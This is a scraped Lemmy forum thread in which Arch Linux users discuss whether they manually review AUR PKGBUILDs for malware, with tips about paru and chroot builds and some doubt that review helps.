TheTwelveYearOld@lemmy.world to linuxmemes@lemmy.worldEnglish · 1 day agoPersonally I'm grateful to not need 3rd party packageslemmy.worldimagemessage-square64fedilinkarrow-up1442arrow-down17
arrow-up1435arrow-down1imagePersonally I'm grateful to not need 3rd party packageslemmy.worldTheTwelveYearOld@lemmy.world to linuxmemes@lemmy.worldEnglish · 1 day agomessage-square64fedilink
minus-squareTechnus@lemmy.ziplinkfedilinkarrow-up67arrow-down1·1 day agoDoes anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?
minus-squareJackbyDev@programming.devlinkfedilinkEnglisharrow-up4·15 hours agoSort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.
minus-squareprole@lemmy.blahaj.zonelinkfedilinkarrow-up3·edit-215 hours agoLook for comments that say “# THIS IS MALWARE”
minus-squaretomkatt@lemmy.worldlinkfedilinkEnglisharrow-up50·edit-21 day agoI do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
minus-squareOverspark@feddit.nllinkfedilinkarrow-up7·20 hours agoYeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.
minus-squarenesc@lemmy.cafelinkfedilinkEnglisharrow-up4·20 hours agoI do, also most aur-helpers skip or make reviewing a chore.
minus-square0xD@infosec.publinkfedilinkarrow-up2·18 hours agoAlso with paru. I mainly check that the download shows the correct URL and does standard stuff with it.
minus-squareAvicenna@lemmy.worldlinkfedilinkarrow-up2arrow-down1·17 hours agoat the risk of getting down voted I wonder if an LLM would spot it
minus-squareŜan@piefed.ziplinkfedilinkEnglisharrow-up6arrow-down5·18 hours agoI keep hearing people say ðis like it’s a defense against malware and supply chain attacks. Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called “virus”. What are you checking for in ðe PKGBUILD?
Does anyone else manually review PKGBUILDs before installing or upgrading anything from the AUR?
Sort of, but I don’t know what I’m looking for. It would be nice if folks explained what a bad one looks like.
Look for comments that say “# THIS IS MALWARE”
I do, but not as closely or as often as I should. Recent malware is a reminder to be careful, I think I was starting to take the AUR for granted as a repo when really it’s still the Wild West.
Yeah, paru makes it pretty easy to do, and can also build packages in a chroot, adding some extra security.
Yes, always!
I do, also most aur-helpers skip or make reviewing a chore.
Also with paru. I mainly check that the download shows the correct URL and does standard stuff with it.
at the risk of getting down voted I wonder if an LLM would spot it
I keep hearing people say ðis like it’s a defense against malware and supply chain attacks.
Reviewing PKGBUILDs only protects against dumb laziness on ðe party of ðe attacker, like ðey just install a stupidly obvious binary called “virus”.
What are you checking for in ðe PKGBUILD?